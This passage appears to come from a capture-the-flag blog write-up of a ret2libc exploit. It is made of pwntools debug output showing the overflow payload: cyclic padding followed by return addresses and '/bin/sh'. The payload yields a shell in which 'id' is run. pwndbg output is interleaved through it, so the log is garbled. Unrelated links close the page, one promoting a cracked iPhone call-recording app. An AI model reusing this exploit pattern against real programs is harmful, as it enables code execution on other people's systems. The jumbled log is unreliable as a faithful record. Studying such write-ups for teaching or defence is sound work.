[DEBUG] Sent 0x81 bytes: │[Inferior 4 (process 311) exited normally]00000000 61 61 61 61 62 61 61 61 63 61 61 61 64 61 61 61 │aaaa│baaa│caaa│daaa│ 00000010 65 61 61 61 66 61 61 61 67 61 61 61 68 61 61 61 │eaaa│faaa│gaaa│haaa│ │ f 6 80486bf main+11900000020 69 61 61 61 6a 61 61 61 6b 61 61 61 6c 61 61 61 │iaaa│jaaa│kaaa│laaa│ │ f 7 f7e06637 __libc_start_main+24700000030 6d 61 61 61 6e 61 61 61 6f 61 61 61 70 61 61 61 │maaa│naaa│oaaa│paaa│ │pwndbg> c00000040 71 61 61 61 72 61 61 61 73 61 61 61 74 61 61 61 │qaaa│raaa│saaa│taaa│ │Continuing.00000050 75 61 61 61 76 61 61 61 77 61 61 61 78 61 61 61 │uaaa│vaaa│waaa│xaaa│ │[New process 309]00000060 79 61 61 61 7a 61 61 62 62 61 61 62 63 61 61 62 │yaaa│zaab│baab│caab│ │process 309 is executing new program: /bin/dash00000070 60 84 04 08 90 84 04 08 80 a0 04 08 80 a0 04 08 │`···│····│····│····│ │[New process 310]00000080 0a │·│ │process 310 is executing new program: /bin/dash00000081 │i[New process 311]
[DEBUG] Sent 0x8 bytes: │process 311 is executing new program: /usr/bin/id'/bin/sh\n' │[Thread debugging using libthread_db enabled]
[*] Switching to interactive mode │Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
$ id │[Inferior 4 (process 311) exited normally]
[DEBUG] Sent 0x3 bytes: │pwndbg> i4.参考资料
【PWN】ret2libc | 狼组安全团队公开知识库
![[AudioRecorder]iPhone苹果通话录音汉化破解版-使用巨魔安装-ios17绕道目前还不支持](https://csdnimg.cn/release/blog_editor_html/release2.3.6/ckeditor/plugins/CsdnLink/icons/icon-default.png?t=N7T8){kind=icon}
![[杂记]mmdetection3.x中的数据流与基本流程详解(数据集读取, 数据增强, 训练)](https://img-blog.csdnimg.cn/direct/6e510634ee994db6b5b73d7bb42f58f7.png)
